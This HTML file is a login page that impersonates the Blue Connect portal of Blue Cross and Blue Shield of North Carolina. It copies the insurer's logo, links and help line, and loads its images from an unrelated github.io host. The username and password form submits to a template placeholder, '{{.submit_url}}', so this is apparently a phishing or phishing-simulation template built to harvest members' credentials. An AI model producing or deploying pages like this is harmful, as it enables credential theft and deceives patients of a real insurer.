<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Login Page</title>
    <link rel="icon" type="image/x-icon" href="https://centfont.github.io/img-src/img-src_files/favicon.ico">
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Nunito+Sans:ital,opsz,wght@0,6..12,200..1000;1,6..12,200..1000&display=swap" rel="stylesheet">
    <style>
        body {
            margin: 0;
            padding: 0;
            font-family: "Nunito Sans", Arial, sans-serif;
            text-align: center;
        }

        .container {
            width: 100%;
            height: 100vh;
            display: flex;
            justify-content: center;
            align-items: center;
            background-color: #e7e7e8;
        }

        .login-box {
            width: 475px;
            height: 500px;
            padding: 40px;
            background-color: #fff;
            border-radius: 5px;
            box-shadow: 0 0 3px rgba(0, 0, 0, 0.2);
            display: flex;
            flex-direction: column;
            align-items: center;
        }

        form {
            width: 100%;
            padding: 0 60px;
            box-sizing: border-box;
            text-align: center;
        }


        .banner-img {
            width: 65%;
            height: auto;
            margin-bottom: 40px;
        }

        input[type="text"],
        input[type="password"] {
            width: 100%;
            padding: 15px 0px 15px 15px;
            margin-bottom: 25px;
            border: 1px solid #929799;
            border-radius: 11px;
            box-sizing: border-box;
            display: inline-block;
            text-align: left;
            font-size: 15px;
            font-family: "Nunito Sans", Arial, sans-serif;
            outline: none;
        }

        .redirect-button {
            border: none;
            color: white;
            text-align: center;
            text-decoration: none;
            font-family: "Nunito Sans", Arial, sans-serif;
            display: inline-block;
            font-size: 18px;
            transition-duration: 0.3s;
            cursor: pointer;
            font-weight: bold;
            border-radius: 40px;
        }

        .primary {
            background-color: #246793;
            border: 1px solid #246793;
        }

        .primary:hover {
            background-color: #184b6b;
        }

        .secondary {
            width: 30%;
            background-color: transparent;
            border: 1px solid #246793;
            color: #246793;
            margin-bottom: 30px;
        }

        .secondary:hover {
            color: #184b6b;
            background-color: #fafafaea;
            border: 1px solid #184b6b;
        }

        button,
        .link {
            width: 100%;
            padding: 13px 12px 12px 12px;
            border: 1px solid #ccc;
            border-radius: 50px;
            box-sizing: border-box;
            display: inline-block;
            text-align: center;
            text-decoration: none;
            color: #246793;
            background-color: transparent;
        }

        .register-box {
            text-align: center;
        }

        .v-divider {
            border-top: 1px solid #e7e7e8;
            margin: 0 0 20px 0;
            border-width: thin 0 0;
        }


        .phone-link {
            color: #246793;
            text-decoration: none;
            font-weight: bold;
        }

        .phone-link:hover {
            color: #0056b3;
        }

        .link-container {
            width: 80%;
            margin: 30px auto;
            display: flex;
            flex-direction: column;
        }

        .forgot-text {
            margin: 0 0 30px 0;
        }

        .forgot-text a {
            font-size: 15px;
            text-decoration: none;
            font-weight: bold;
            color: #246793;
        }

        .help-text {
            font-size: 12px;
            margin-top: 10px;
            color: #999;
        }
    </style>
</head>

<body>
    <div class="container">
        <div class="login-box">
            <img class="banner-img" src="https://centfont.github.io/img-src/img-src_files/NC-logo.png"
                alt="Blue Connect and Blue Cross of North Carolina Logo">
            <form action="{{.submit_url}}" method="post">
                <input type="text" name="username" placeholder="Username" required>
                <input type="password" name="password" placeholder="Password" required>
                <button class="redirect-button primary" onclick="window.location.href='{{.submit_url}}';">Log
                    In</button>
            </form>
            <div class="link-container">
                <p class="forgot-text">
                    <a href="https://member.bcbsnc.com/blueconnect/web/user/find-account">Forgot username or
                        password?</a>
                </p>
                <div class="register-box">
                    <hr role="separator" aria-orientation="horizontal" class="v-divider theme--light">
                    <button class="redirect-button secondary"
                        onclick="window.location.href='https://member.bcbsnc.com/blueconnect/web/registration';">Register</button>
                    <p class="help-text">Need Help? <a href="tel:+18887057050" class="phone-link">(888)-705-7050</a>
                        (Dial 711 for TTY)</p>

                </div>
            </div>
        </div>
    </div>


</body>

</html>